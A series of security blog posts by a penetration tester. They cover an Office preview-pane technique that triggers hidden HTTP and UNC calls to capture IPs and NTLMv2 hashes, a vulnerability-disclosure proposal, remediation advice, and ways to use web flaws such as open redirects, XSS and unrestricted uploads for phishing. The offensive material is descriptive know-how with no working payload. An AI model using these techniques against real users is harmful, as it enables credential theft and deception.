November 26, 2019

Getting Malicious Office Documents to Fire Without Protected View

Intro


I wanted to share an interesting behavior I discovered with Microsoft Office documents using a fully patched Windows 10 operating system and an up-to-date local installation of MS Office 365. I’ve been doing a lot of development work on my phishing tool lately, PhishAPI, and more or less stumbled across this new technique. I have reported it to Microsoft.

I’m writing this blog post in order to hopefully shed some light on the risk this issue introduces and to assist with white-hat phishing techniques. Most savvy users know better than to enable “Protected View” mode when opening their remote Office documents, although that still works well to this day for the less aware. The result can be captured information such as an IP address, action timestamps, OS/Office version disclosures, and perhaps the biggest, NTLMv2 hash leaks!

Some Background


The technique of embedding invisible HTTP and UNC calls in Microsoft Office documents is not a new one and has been around for some time now.  As most of you probably know already, newer Office files such as Word documents (docx) are essentially compressed archives themselves with XML data within them.  To see this for yourself, simply open a docx file in your favorite archive tool or rename to .zip and open it directly to see the contents.


Within these archives are resources such as images within the Word document, as well as XML files which reference their locations.  You can use external images as well, which is where HTTP calls come in.  You can reference an external URI instead of a physical path within the document itself and Word will gladly call out to retrieve it over the Internet.  You can make this an invisible image so it's not seen in the document viewer itself.  A quick and easy technique used by red teams is to set up a netcat listener to wait for the call, something like `nc -lv 0.0.0.0 80`.  With some basic logging they can see the source IP which requested the resource and know when the connection occurred.

With PhishAPI, I took things a step further by automating the XML creation for new documents, as well as inserting a hook into existing documents the user can upload through a web interface.  This way you should never have to touch the XML or open up a Word document to weaponize it, and everything can be done quickly and easily.  I wrote another blog about that process if you'd like to read it.  Essentially, PhishAPI works as a web service to listen for these requests and captures IP addresses, user-agent information, credentials (like Phishery, by using basic-auth), and hashes if it's an SMB request via the UNC call (thanks to Responder in the background!).  It does a lot of other things too, such as clones fake portals, but that's outside of the scope of this discussion.  It then looks up a GUID in a database when it receives a request in order to relate it to a specific phishing campaign and target and then alerts via a specified Slack channel so the "attacker" can be notified in real-time.  Enough about PhishAPI though, this is what the XML would look like in the Word document if you were to do something like this manually:


To mitigate this, Microsoft added something called "Protected View" to the Office suite back in the "2010" version.  Everyone's probably familiar with this little yellow ribbon at the top of your documents which you have to "Enable" in order to make changes or run dynamic content.  This is Microsoft's way of protecting the average user who just wants to view a remote document without needing to run macros and other dynamic/remote content.  There's actually a flag which gets set when the document originates from somewhere other than your workstation which enables Protected View.  Once you manually override protected view once, the flag gets reset and will not prompt again for that document.  You're essentially marking this document as safe and can move on.  You can also universally disable the setting in Word but that's not recommended and isn't a default, so not many users would be susceptible.


If you don't supply your own document to PhishAPI, it uses this as a default template in an attempt to fool users into "Enable Editing" on their own.  I know, dirty!  However, if they just view the document and do not bypass Protected View on their own, the call will never make it to the PhishAPI server and I won't receive any notification the user even opened it.  Bummer!

The Discovery


I used PhishAPI to generate a new document using the default template as I had done many times before.  This was for a current social engineering engagement we were performing for a client.  I downloaded the Word doc, browsed out to the location using Windows File Explorer, and sent it to a co-worker so they could have some Phishing fun in our Slack channel.  I was surprised to see the document had already fired off an alert, knowing that this was a newly created document from the Internet and would have had the Protected View flag still set.  I never opened it!  


I quickly realized that was the case due to my use of the "Preview Pane" in file explorer on Windows 10.  Just highlighting the document caused the internal payload to execute in the context of my user account on Windows.  With it being a "preview", there was no "Protected View" ribbon to display.  This was interesting to me because my assumption was that by default, the preview version of the document (both handled by Microsoft) would have simply not shown dynamic or remote content.


You can see in the above image I still received the Slack notification even though this document has yet to be opened.  It did not clear the flag from the document, however, because when I opened it in Word I was still prompted and it did not fire the payload.

Okay, so HTTP requests are one thing, but can SMB requests initiated from UNC calls still leak an NTLMv2 hash from my user account?  You bet!  I fired up a local instance of Responder to listen on TCP 445/139 and even though "Protected View" was still set, I received my own hash on the local network.  Yikes!


Lastly, another thing I noticed is that O365 for web (in a web browser) renders the page without protected view as well, and causes at least the HTTP payload to fire.  This is nice if your target is using O365 and you want to collect those Phishing statistics and know if they opened your email.  During my research I wasn't able to get SMB to fire in the same way that this bypass technique works.  I also noticed the plaintext credential technique does not work here or locally due to the preview functionality not prompting for basic-auth when responding to 401 status codes.

So preview pane might not always be enabled on your victim's workstation, but that's ok!  I've noticed that the major web browsers (at least Firefox and Chrome) enable previews by default when you're uploading a file to a web site.  The following screenshots are after I disabled Preview Pane in File Explorer and uploaded a file via Firefox and Chrome (Slack).  You can see the call in the background of the second image.

Firefox "File Upload" with Default Preview Pane

Chrome "Open" with Default Preview Pane

Conclusion


So what’s the big deal? Well, for one, if you were crafty with your phishing campaign and you wanted to gather leaked information and hashes, you could probably prompt for an upload on your site to trigger the payload, for example. For another, there’s a big false sense of security users have when dealing with malicious documents (maldocs). They assume as long as they don’t open the file, or they open it but do not accept any prompts, they’re completely safe. However, as I’ve just demonstrated, just having the file exist on their file system is likely to eventually be triggered when the victim is browsing files at a later time. Perhaps they want to select it to send it to the Recycling Bin. This likely explains why a number of my phishing campaigns did not trigger initially but did several months after the campaign had ended, resulting in crackable NTLMv2 hashes.
I’ve sent this to Microsoft’s MSRC team as a potential bypass technique for Office’s “Protected View”. Unfortunately, after a couple of weeks of waiting for a response, they acknowledged this is in fact an issue they plan to address in the future but will not be awarding me with a bounty and plan to offer no future updates. That’s bad news for me, but great news for anyone who plans to leverage this for red teams since there’s unlikely to be a fix anytime soon. Here’s the quote:

“Our engineering team(s) determined that a fix for this issue does not meet our criteria for immediate security servicing. However it is a candidate for consideration for potential improvements in a future version of this product or service. At this time, we will not be providing ongoing updates of the status, or if there will be a fix for this issue, and we have closed this case.

Your report is not acknowledged as a security vulnerability by Microsoft. While all security vulnerabilities are bugs not all bugs are security vulnerabilities that meet the criteria for immediate security servicing.”

Although it doesn’t entirely bypass the security feature within the suite itself, I think there’s still an issue here that exposes users to the risk of stolen credentials or leaked sensitive information at the very least. In fact, I believe it’s more severe than a direct bypass since you don’t even have to open the file, you just have to simply select it. I hope this blog helps to highlight this risk as a user and gives white-hat red teams another vector when Phishing. Hopefully, it will be resolved as I do believe the default should be to not render dynamic or external content. Stay safe out there!

October 22, 2019

Bugs Wanted Dead or Alive - A New Approach to Responsible Disclosure for All


"What's all the hubbub, bub?"


In this blog I'd like to talk to you about hunting bugs in your environment.  After all, a large part of proactive security is all about finding and eliminating bugs before your adversary can leverage them against you.  It's not a point-in-time task, it's a constant battle due to new issues which can surface at any time.  We're in a an on-going bug-squashing-frenzy for the foreseeable future and the outlaws can weaponize and script exploitation of these bugs in near-real time.  It's the wild-wild west out there, folks!  After this you'll be the "hootin'est, tootin'est, shootin'est, bob-tail wildcat, in the west!"



No matter who you are or what your security maturity level is in your organization, there's always room for improvement.  I also want to discuss responsible disclosure in the form of Vulnerability Disclosure Programs (VDP's), it's current limitations, and propose a potential solution for a simple and standardized approach that everyone can adopt, no matter how small or large your business is.

Check Your Posture


Honestly, How Many People Just Sat Up Straighter in Their Chairs?

Depending on the security maturity level of your organization, you have some options when it comes to squashing bugs.  Maybe your security posture is hardened and you’re ready to participate in a bug bounty program or red team assessment.  Perhaps you’re just getting started and need to begin with vulnerability scans or penetration testing first.  Wherever you are, there are options you have to continue strengthening that posture and we’ll discuss the pros and cons of each.  The end goal is the same either way, we want to exterminate these bugs first!

A common pitfall I see is when a client wants to put the proverbial cart before the horse.  They've never done a penetration test before but they want to go "all in" and start with an advanced Red Team.  Don't get me wrong, it's wonderful that they're ready to take this on and start taking security vulnerabilities seriously.  However, I don't think there's a lot of value in running before you can walk.  There may be more value in starting with something like a vulnerability scan in order to eliminate the low-hanging fruit before simulating a nation-state attacker.  In my opinion a red team should be leveraged to test the defenses of an organization after they feel like they've fortified their environment as best they can.  They're seeing how they hold up against the storm and how good their defenses are at identifying and stopping potential threats.  Otherwise it's like shooting fish in a barrel for a tester and they may not have to try, thus bringing into awareness, other techniques that may be available to them.  Tired of these metaphors yet?  😃


"Say your prayers, Varmint!"


  • Vulnerability Scanning
Everyone should be doing some level of External and Internal vulnerability scanning on a recurring schedule.  This is the easiest way to identify bugs and prevent scripted and other non-targeted attacks against your assets.  It also is a good way to verify that your patch management process is working properly (you are patching, right?).  Lastly, there's the added benefit of catching configuration mistakes and keeping change management in check.

There are a couple of different types of vulnerability scanning, but we typically talks about scanning networks and web applications.  This can be unauthenticated or authenticated for either, or in the case of AppSec, Dynamic or Static (code analysis).  If internal resources are limited, you can have this managed for you as a service, or, if budget is a problem you may opt to have your own scanner in-house.  Either way, this is something everyone should be doing no matter if they're swiss cheese or Fort Knox.
  • Penetration Testing
I have to say this again, but Penetration Testing is not the same as Vulnerability Scanning.  Pentesting expands upon the discovery of vulnerabilities by actively exploiting them in order to gain access to the environment and sensitive data within.  Many tools and manual methodologies are used that are not during a typical vulnerability scan.  Most organizations today perform pentesting at least once a  year in addition to regular vulnerability scanning.
  • Red Team
Red teaming expands upon penetration testing by simulating a real-world targeted attack against your organization.  Often times there is more time allocated for Open Source Intelligence (OSINT) and reconnaissance as well as Social Engineering.  Less information is given up front by the client and the engagement is very much a black-box approach. 
  • Bug Bounty
If you've been doing the above for a while and you're confident in your stance, you may consider being ready for a bug bounty program to see how you hold up against a larger attack surface.  There are private programs for those which want to test the waters and control the testing process, as well as public programs for those whom are ready to open up the flood gates to everyone.  There are some pros and cons involved with bug bounties, which I'll touch on briefly.  

The benefits are pretty obvious I think.  If done properly, they can be more effective at uncovering bugs and cost less than a traditional red team or pentest engagement.  With a larger talent pool of bug hunters who are financially motivated, they are likely to find things which may otherwise not be found within the constraints of a normal pentest.  I know from personal experience I've found bugs in software prior to them having a bug bounty program and years later when I revisited them, the issues had been resolved.  Private programs can also enforce a non-disclosure agreement (NDA) which limits bad publicity when a bug is discovered.

However, if done improperly or before you're ready, it can be much more costly depending on the reward system agreed upon and how public your program is.  Also, on the opposite side of the same coin with a larger talent pool, you're likely to have many more inexperienced people testing your resources.  This can be a problem if they ignore or fail to follow your scope or testing guidelines and can negatively impact your availability.  It's also a full time job for someone to respond to and vet submissions.  Reports can vary from tester to tester and many do not qualify as actionable security issues.  Another thing I've noticed is that inexperienced testers may find a low-hanging vulnerability such as Cross-Site Scripting (XSS) but lacks the knowledge and experience to know that this may be chained together with another vulnerability to further the attack.  You may respond to and fix this one issue only to be missing the bigger risk if it were to show up elsewhere.
  • Responsible Disclosure / Vulnerability Disclosure Program (VDP)
Finally, the main point in this blog!  Do you (yes, you!) have a VDP?  In short, a VDP is a program or policy that makes it clear and easy for a third party or researcher to follow your preferred process for disclosing a vulnerability to you.  Let me be clear.. you WANT to encourage this.  As a vendor, white hat researchers will likely come across issues over time and you want them to report them to you before the black hats find them (they will!).  You don't have to pay monetary rewards, but this is just more incentive for reporting if you can swing it.  Even without it, you'll hopefully have people responsibly disclosing bugs just to do the right thing, even though it may come with some personal risk to themselves.  You're getting free security consultation!

History is filled with examples of how responsible disclosure attempts were handled poorly by vendors and trust with researchers was lost in the process.  Due to mostly a lack of understanding or from bad experiences where it wasn't handled well, vendors often feel threatened or possibly even blackmailed by requests for rewards in exchange for proof-of-concepts (PoCs).  Researchers have been prosecuted as a result of "hacking" without permission and the scene has been an ugly one for some time, with the community essentially all but giving up on responsible disclosure.  It's hard to fault a researcher for taking a (sometimes great) personal risk for little or no reward just because they want to do the right thing.

I personally have disclosed dozens of bugs to vendors and open source tools because I believe it helps make the Internet a safer place for everyone.  Corny, I know.. but I genuinely feel passionate about this.  Sometimes selfishly, the severity of the bug has the potential to impact my own information sitting on a database and I have a personal motivation to help resolve the issue.  I'll often spend a lot of time sifting through social media, "about us" sections of the website, and various other sources to find the best security contact to report the issue to.  I'll also check to see if they have a current bug bounty.  If they do not, more often than not I'll take the time to draft up a report and send it via a third party like US-CERT or I'll send it anonymously from a disposable email account over a VPN so it can't be easily traced back to me.  This is sad, because it makes me feel like a criminal when all I want to do is help.  I'll often get asked by other white hats what to do when they stumble across something like this.  I typically ask, "Well are you hoping to get something out of this?  How did you discover it?"  I try to make them think through the risk vs the potential reward.  Often times they determine it's just not worth taking the risk at all, which does no one a service in the end.  All because there isn't enough information to determine how the company will respond.  Sometimes they are grateful and understand the benefit while other times they act defensively.

So what's the solution?  In my opinion, EVERYONE should have a VDP in place, no matter how small or large the organization.  The VDP has to be easy to find, contain clear and concise information, make it quick and easy for the researcher, and most importantly, reassure the researcher that they will not be prosecuted for reporting issues in good faith.  This last point is called a "Safe Harbor" clause.  Also notice how I said "quick and easy", which is key when you want to encourage responsible disclosure, especially when there's no financial incentive for researchers to report bugs.  If you make it difficult to locate the specifics of the VDP such as the primary PoC or they feel like there's a risk of being prosecuted, the likelihood of responsible disclosure will be low.  This means it will remain until someone else finds it, which could mean a breach for you.

The trouble with VDPs today is that hardly anyone implements them.  NIST just recently incorporated language into their Cybersecurity Framework in 2018, but speaking with my Compliance team internally they have yet to run into a client where they've helped implement or review one.  In fact, according to HackerOne, out of the Forbes Global 2000 list of businesses 93% of them did not have a VDP.  I personally believe one of the reasons for this is the lack of standardization.  The National Telecommunications and Information Administration (NTIA) has a template which is a wonderful effort, but there are no guidelines on where to store this consistently on each site and it's a lot to read through for any researcher.  We need something better, which leads me to an idea I have and a concept of what the future could look like in an ideal world.  In short, I'm hoping to create a movement which can be easily adopted by all in order to make the Internet a safer place by encouraging (not discouraging) responsible disclosure.



Well as a researcher I want a place I can go to in order to know for sure if there's a VDP in place and as a former administrator I would want to be able to implement it easily.  If that VDP is in place, I want to quickly determine if they have a safe harbor promise and who the primary contact is for reporting security issues.  I also want an easy way to report, because in all honesty if I have to spend a lot of my free time building PoC videos and custom documentation it may not be worth my time.  

As I think about the problem and potential standardization and automated solutions, some come to mind.  An email distribution could be adopted by everyone, such as security@org.com, but that would be difficult to keep consistent and you would have to inquire about such a program first.  Likewise, you could try to get everyone to reserve "/vdp" as an application path or subdomain to place the VDP policy in, but that's not always practical and can't easily be parsed.  What may work is a centralized, non-profit database which acts as a central authority for everyone.  However, you run into issues with trust, maintenance, and ownership and things get complicated quickly.

As I thought more about this, I couldn't help but reflect on robots.txt files on the root directory of web servers.  As most of you already are aware, a robots.txt file is a plain text file which is meant for search engine bots to be able to parse in order to know which contents of a web site should be spidered or not.  It's not seen by your typical user unless that user is technical and wants to view the contents.  Go ahead, head on over to https://medium.com/robots.txt to see what I mean.  I believe this same approach can be adopted for VDP use.  Something as simple as a file named vdp.txt can be placed alongside robots.txt and could be in a format that's both human readable and can be parsed by a script, such as yaml, xml, or json.  The information contained within could be used by vulnerability scanners to make automatic reporting of new issues a breeze for researchers.  See an example I created below:

vdp.txt

If the organization also wants to adopt a rich HTML page for their disclosure policy they can reference it here for more information.  They can also specify things such as scope, which issues are not included (for the scanners to reference), contact methods and their recipients, the safe harbor promise, and other requests and rewards for the program.  Vulnerability Scanners such as Burp Suite Professional and Nessus, to name a couple, could parse this information automatically based on the in-scope domain and display reporting functionality for organizations with a VDP.  It can also be specific for issues which are in scope and haven't previously been reported through known CVE's.  

Burp Suite Professional - Reporting VDP Concept

Nessus - Reporting VDP Concept

The idea here is that if the target has a VDP and both the bug and resource are in-scope, a "Report Issues" tab could be adopted by vulnerability scanners to make bug reporting easy.  In fact, I'm working on a Burp Suite Extender plugin right now to do just this that anyone can add.  One button may allow a customized email with an attached HTML report to be composed by pulling in contact information for the researcher and the target's PoC.  Another button could report through a third party proxy, such as US-CERT, and another could automate and send a basic report without any user interaction.  Finally, the last option could be to simply parse and display the target's VDP policy without ever leaving the testing tool of choice.

"Th-th-th-that's all, folks!"

Let's Squash Some Bugs!

I'm not saying my solution is the only one and I'm sure other people have had better ideas.  However, I haven't seen anything to date and I'm hoping to ignite the discussion and inspire something like this to happen.  I'm hoping to finalize my vdp.txt template and Burp plugin soon and share it on my GitHub account so anyone can improve upon and implement, within minutes.  I'd love to see a movement like this take off across the Internet even if it's not my method.  My point in this entire article is simply that VDP is a great idea but it's broken in it's current state.  We need to encourage responsible disclosure in order to squash bugs and we need to make it easy and safe for the researchers and for organizations or it won't happen.  Thanks for tuning in.  Until next time!

September 01, 2019

Vulnerability Remediation - Fight for the Users


Off the Grid

When you're zooming by on your light cycle looking through your most recent vulnerability assessment or penetration testing results, I challenge you to be more like Tron and fight for your users.  He's a security program after all!  What I mean is that typically organizations are focused on the vulnerabilities that directly affect their environment, and understandably so.  We still have a tendency today to think of our networks as a castle with a strong perimeter to keep us safe from the chaos of the Internet.  It's amazing to me how often customers will approach the task of remediation from the mindset of protecting only their hosts and services from a direct attack.  Vulnerabilities that affect the customers (users) of that organization are not just deprioritized, they're often times flat out ignored.   It's true that most vulnerabilities that affect the users have a lower severity and shouldn't be prioritized to something to the likes of Remote Code Execution (RCE) on a server with a Critical severity, but they also shouldn't be downplayed.  Often times it feels like the likelihood of attack for some of these is far off, or maybe it doesn't seem like a concern because the attack would have to occur off of your network (external MITM), but they could still pose a serious risk to the organization if exploited by a dedicated adversary.  

Like This Guy! (Master Control Program)


I'll Clu You In

A common example of a vulnerability that affects a user may be one that's carried out by a Man-in-the-Middle (MITM) attack.  Take for example, an SSL/TLS Downgrade or Weak Encryption Cipher/Algorithm issue.  These are common in vulnerability reports due to the number of encrypted web services available on the external and internal environments and the rate in which ciphers, algorithms, and certificates become outdated and are no longer strong or valid.  When a customer sees these, I can almost hear the eyes rolling from over the speaker phone.  Perhaps they start out sounding concerned, "Is this like Heartbleed?  Can they capture leaky data from the server?"  To which I reply, "Well no.. but if someone was positioned between a user somewhere and the server they could potentially intercept data in cleartext."  They usually laugh at this point among themselves and make a remark about how unlikely such an event would be, especially when external facing only.  As I said before, even if it is less likely due to the nature of the setup for such an attack, it could potentially be devastating for a business.  Think about what kind of information is being sent to and from your external web services.  Are there credentials involved for remote administrative services?  Where else are these domain credentials leveraged externally?  Even if those services are secure, it may not matter if credentials were obtained via another vulnerable one.  Where would these credentials lead an unauthorized user?

I think also from a risk perspective they may simply not believe it's their responsibility.  They want to protect the village within the castle walls and don't really think of the users external to their environment as assets they need to help protect.  We have a tendency to put our arms around our internal systems and users.  Let's save the peasants!

Let's Like, Talk Examples, Man.. (in the voice of Jeff Bridges)

Man in the Middle (MITM)

We talked about weak encryption already, but services that offer no encryption such as HTTP, FTP, and Telnet to name a few, do little or nothing to protect the end user and the server from traffic interception.  All of these may lead to information disclosure in the form of captured credentials, passwords, or whatever sensitive information is in use by the service, but can also lead to the modification of the data in transit.  I'm speaking to the "Integrity" component of the CIA Triad, specifically.  This essentially means the user is on their own when attempting to determine the authenticity and integrity of the service and data they are interacting with.  They may disclose information to an attacker directly or indirectly and they could download malware, etc.  

I'm sure many of you are aware of the scenarios in which this type of attack can be pulled off.  If it's an internal system, the attacker would have to already have a foothold into the environment in question.  If this is external (on the perimeter of the target's environment) this data could be intercepted by someone sharing the same network as the victim.  This could be a public WiFi hotspot in a coffee shop or airport.

Self Signed and Expired Certs

Another example I see commonly of ways we're not doing our users any favors is in the form of self signed or expired certificates.  Generally the attitude is, "Well it's better that we have encryption right?" or "I don't see the harm since the data in transit is using strong encryption ciphers".  The main problem here, in my opinion, is that we're desensitizing our users who should be looking for warning signs.  This is the opposite of security awareness training, in that we're telling our users, "When you see this warning in your browser you should ignore it and add the exception."  Again, it also does little to provide any authenticity assurance that we're interacting with a trusted server like we believe we are.  If cost is an issue, consider a free Certificate Authority such as Let's Encrypt or getting a wild-card certificate for your organization and using a subdomain for these services.  This is usually such a small change for the administrative staff and a big victory for the end users.

Insecure Handling of Sensitive Information

This category of vulnerabilities is more Application Security focused in my mind (it doesn't have to be), but deals with the transmission of sensitive information.  A few specific examples of this may be passwords that are sent over GET requests instead of POST, session tokens in the URL, and HTML form fields that do not explicitly tell the browser to ignore autocomplete for sensitive input fields such as passwords and credit cards.  These can all result in the interception of sensitive user information even if the service is properly encrypted and the user does everything right.  These are issues the development team should be aware of as they design and build the application.

Session Issues

Here's another AppSec category that describes issues which put the user of the application at risk.  I'm referring to session issues such as broken session termination, overly long or non-existent timeouts, and fixation vulnerabilities.  Like most of these examples this may not leave the application itself open to a direct takeover, but indirectly exposes the users to risk that could then lead to something more serious for the organization.  For example, remote attackers may be able to hijack a user's session and use their new vantage point to look for post-authentication vulnerabilities that may be inaccessible without credentials.  Or, maybe depending on the user, such as an admin, they can do a lot under the context of that hijacked account.  Another example may be malware on a victim's machine that allows someone to jump into an active session because it never expired or logged out successfully.  I've done this personally on many red team engagements thanks to people leaving their browser tabs open and logged in, with the application not having a care in the world. 

Third Party Client Vulnerabilities 

The final example I'll use to help make my point relates to third party patching issues, which I see a lot of.  Now these users are internal users typically but could be external customers if you design software.  Not only do I see this finding a lot during most assessments we perform, I don't see it resolved at the same rate missing Operating System patches are applied.  For one thing it's not built directly into the update process by default so third party applications are inherently more difficult to keep up to date.  That, and if you allow your users to install their own files (DON'T OR YOU'LL BE DEREZZED!) this makes managing the inventory very difficult.  Programs such as Ninite, SCCM, and others can help keep these applications up to date.

Users use.. applications such as their browser, Adobe Reader, Flash (is this still a thing?), Java (is this still a thing?) and others in order to perform their daily job responsibilities.  However, leaving your users exposed could open them up to a watering-hole or drive-by download attack.  Maybe they are phished and open a PDF but they "didn't click on anything".  They may be compromised and in turn expose the organization to a breach by means of lateral moment and escalation.


End of Line

Users often are a cause of frustration for us when it comes to security, so there's a bit of a stigma that comes with supporting users.  (ID10T!)  Whether it's in the form of a phishing victim, accidentally installed malware, configuration mistake, or some other user error, there's only so much we as security professionals can do to lower the risk.  For the things that are more outside of our influence, we try to correct behaviors with security awareness, secure code development, and internal social engineering training.  However, if we can proactively help our users by taking steps to secure our back end systems that we do have control over, no matter how small the risk may seem, each "fix" will be another cumulative brick in our walls to help protect the environment.  

Thanks all!  Stay in the game!

"Greetings. The Master Control Program has chosen you to serve your system on the Game Grid. Those of you who continue to profess a belief in the Users will receive the standard substandard training, which will result in your eventual elimination."

June 25, 2019

One-Two Punch: Using AppSec to Up Your Pentests and Phishing Gigs


Let's Get Ready to Rumble!


In this corner we have the previous InfoSec champion of the world, penetration testing.  Pentesting is no stranger in the Cybersecurity space.  In the other, and also popular, dynamic application security testing.  These are not the same, but have you considered using AppSec to enhance your existing penetration testing and phishing engagements?  Instead of viewing these consulting services as distinct, isolated components, AppSec can be a great multiplier when teamed up with pentesting/red teaming and  phishing.  The result is a more comprehensive, holistic view of the environment and can lead to better results in the other red team activities.

I'm writing this blog because it's not always obvious to pentesters and I often find critical web vulnerabilities that were missed by other teams.  AppSec seems to be the path less traveled, especially when the engagement isn't sold specifically as a static or dynamic application security gig.  The client is expecting that punch to the head, the vulnerability scan and the Man-in-the-Middle attack.  They're not expecting that left hook, the external command injection vulnerability on their HR server.  It can be the difference between a knockout (KO) and a total knockout (TKO) report for the client.  Just ask King Hippo.


Round 1: Penetration Testing & Red Team (Physical)


Fortunately for you, dear reader, I decided not to go into full-on story mode with this blog.  I'll cite some examples at a high level that I've experienced personally but for the most part I'll keep it short and simple.  There are multiple instances I've experienced while doing either penetration testing or red team activities where AppSec made the difference between a successful engagement and a so-so one.  You might be thinking, "Well my vulnerability scanners support application testing".  True, but they typically aren't very comprehensive.  Sorry, they just aren't.  (Looking at you, Tenable!)

Traditional Penetration Testing

The issues below are just some examples of web findings I've come across that aided with my penetration tests in the past:

  • SQL Injection (SQLi)
  • Local File Include (LFI)
  • Server Side Request Forgery (SSRF)
  • Unrestricted File Uploads (Web Shells, Hashes, etc)
  • Misconfigured Web Services / Information Disclosure (Directory Listing, Verbose Error Messages, etc)

I was once doing a pentest for a new client who was big on rotating their security vendors annually.  Although I support having a fresh set of eyes working on your environment each time, I think there's some value in security professionals knowing your network and business.  As a manager I strongly believed in rotating the lead internally for each recurring engagement.  I digress..

This one particular environment was somewhat mature from a security perspective and had regular vulnerability scanning and penetration testing performed on their external perimeter.  Not surprisingly, I wasn't able to find anything worthwhile to leverage in order to gain access to the Internal environment and my go-to (phishing) wasn't in scope.  Instead, I used the leftover time I had available to do some application security testing in Burp Suite Professional.  Using my nmap/Nessus host and service discovery results, I sucked the web services into Burp's sitemap and started testing.  It wasn't long until I found unauthenticated SQL injection with os-shell access.  The service was running as an elevated account, so from here it was an easy win from an internal testing perspective.

Had the web applications been tested by the prior security firm this wouldn't have happened and I would likely have struggled to find any worthwhile results during the engagement.  I've seen the same thing with LFI for gaining access to credentials, SSRF to access sensitive internal systems that aren't exposed publicly, unrestricted file uploads leading to web shells and NTLMv2 hash leaks, and misconfigured web services resulting in sensitive information disclosure by means of directory listing and verbose error messages.  I've also seen directory listings that exposed SQL backup files and htaccess files with credentials or hashes in them.  I'm sure I'm not alone here..

Red Team / Physical Penetration Testing / Physical Social Engineering

These engagements can be really fun.  Typically there's a lot of recon and planning that goes on prior to an on-site activity.  Here are just a few of the things I've seen via web applications that could come in really handy during a red team engagement;

  • Physical Access Control Systems (Default or Weak Credentials, Auth Bypass, etc)
  • Access and Control of Camera / Security Systems
  • Access Codes for Doors / Badges
  • Building and Cubicle Diagrams

As you can imagine, having someone on your team who can give you access to the facilities while you're physically on-site doing a red team can come in really handy.  A remote teammate or even you yourself with an Internet connected device could remotely open garage doors, unlock interior doors, and disable the cameras to go undetected, Mission Impossible style!  I've accessed building codes and cubicle layouts just from unauthenticated directory listing vulns on publicly facing web servers before!

Tools

  • HTTP_Screenshot (SpiderLabs)
This is an oldie but a goodie.  If you can get past the dependencies to install successfully (PhantomJS, etc) then it's worth it.  This is an Nmap NSE script, so you can run it during host and service enumeration to get a separate image file (PNG) created for each web service, from the perspective of a browser.  I always use this for penetration tests so I can quickly look through the web services to determine if there's a web portal I want to target manually.  This is especially useful when your target is a web development or web hosting company and there are a good deal of web services in the environment.
  • Burp Importer
I love this one.  On my team we use Nessus as one of many tools in our arsenal, but really leverage it mostly for host and service discovery.  The .nessus file type that you can export is really just an XML file underneath the hood.  This Burp Suite Professional Extender plugin is really nice in that it imports all relevant web services by IP and Port into the Burp Sitemap via the Nessus output.  It makes adding them to your Target and spidering/scanning really quick and convenient.
  • DirBuster / Burp Content Discovery
Because most web services detected will be by the IP address and port, the default web path may not be known.  Instead, you may get a default IIS/Apache landing page or a 403 Forbidden response code.  Even if you do get a valid page, it's possible there are other "hidden" paths or files uploaded to the web directory that shouldn't be accessible, so using a tool like Burp's Content Discovery or OWASP's DirBuster is a great way to find what others may have missed. 
  • WPScan
This is true for any Content Management System (CMS), but Wordpress especially is a goldmine for security issues, typically due to a lack of patching in regards to libraries, themes, and plugins.  WPScan is an excellent tool for quickly identifying the version and the vulnerable components as well as enumerating and brute forcing user accounts.

Round 2: Phishing


I never do phishing without doing some AppSec up front first.  It's come in handy more times than I care to count.  Most AppSec vulnerabilities that are useful for phishing involve being able to host content on the target's own environment so that URLs can be crafted to look like they originate from the legitimate domain.  Here are the ones I'm specifically looking for:
  • Open Redirects
Open Redirect vulnerabilities (via GET requests) allow the attacker to craft a URL that originates from the target domain but redirects via a 302 response code to a third party domain of their choosing. This technique is used by attackers in the real-world often and for good reason, it’s very difficult for a user, even with security awareness training, to spot the fake request since they recognize the domain. This, and the techniques below, often sail right past any web content filters and spam filters as well. Attackers can even obfuscate the redirect parameters at the end of the URI by using URL encoding, making it that much more difficult to spot as a fake.
  • Unrestricted File Upload + Indirect Object Reference (IDOR)
During a penetration test for a large university, I leveraged a combination attack where the school had student printing services with an unrestricted file upload vulnerability.  I was able to bypass the client-side content-type filters to upload an HTML file instead of a DOCX file.  In addition to this, they had Indirect Object Reference issues and it was trivial for me to be able to locate and craft a URL to access my uploaded HTML file.  Compounding the issue further was the fact that no authentication was required, so what I now had was my own site hosted by the .edu domain, which is difficult to spoof otherwise since .edu top level domains are off-limits to the general public.  As you can imagine, it was easy from here to set up a fake login form that posted credentials to my own third party site and redirect the unknowing victim on to their post-authenticated resource.
  • Cross Site Scripting (XSS)
Cross Site Scripting vulnerabilities are yet another way to control the content hosted on the phishing recipient's own domain.  By injecting HTML into the page by means of XSS, it is possible to alter the content of forms.  Additionally if the X-Frame-Options security header is missing in the web service's configuration settings, it's possible to create a full-frame iframe and completely redesign the vulnerable target site, hosting your own content.  If this is stored or reflected XSS you can craft a URL to your page and email the link to your victim.
  • Remote File Include (RFI)
RFI vulnerabilities are ways to include, or reference, external resources.  Sometimes this can be JavaScript, server-side scripting pages, or just a static HTML page.  RFI is another example of potential content modification, making it possible to craft a URL originating from the legitimate victim's domain but actually pulling content from an attacker-controlled server.

DING DING!  And Our Winner Is...


Hopefully this blog serves to help those who don't typically take an in-depth look at web applications during phishing or penetration testing activities.  If you already do this, great!  Keep it up!  I likely missed some examples and vulnerabilities that can be used in this manner, so please let me know if you have something to add so we can all improve. 😃  Dynamic Application Security Testing can stand on it's own as an excellent service, but it's unique in that it can also serve as a teammate to these other services, much like Mickey is to Rocky.  Until next time!  (Cue Eye of the Tiger Music)


- Curtis Brazzell

June 06, 2019

Not Just a Vuln Scan - Are You Receiving/Providing Quality Security Assessments?


Intro


Having a diverse background in Information Security has given me what I think is a unique perspective on both the receiving end and the giving end of technical security assessments.  In sales support roles, I'm always trying to help understand and get to the bottom of what it is exactly that our customer is most in need of.  There's something really rewarding in being able to translate and traverse the middle ground between technical jargon and bridging the gap between sales and executive-level decision makers.  It may sound cliche to say, but I honest-to-goodness really have a passion for helping people find the most value in these assessments and to walk away with them being more secure than they were before engaging with our team.

Similarly, it really irks me to my core when I come across a statement of work or the results of a previous assessment and it was performed in a way that does not maximize the effectiveness of said assessment.  With so many technical service offerings available and different organizations providing these services, it's hard to fault the customer or even the sales person who may simply struggle to understand them fully.  Perhaps there's a limited budget available and services weren't properly prioritized.  This is why it's so important to have a technical resource available during the beginning phases of sales conversations, even though most of us in this field just like to focus on delivery.  Today, just about everyone offers a Penetration Test but testing methodologies are not always standardized and sadly, some aren't even a pentest by definition!  

In this blog I hope to lay out some ways in which as a customer you can help ensure you're getting a quality assessment.  If you're a technical resource, I also hope to help outline ways in which you can make sure you're offering the right assessment and delivering consistent, actionable results which are valuable to your customer.

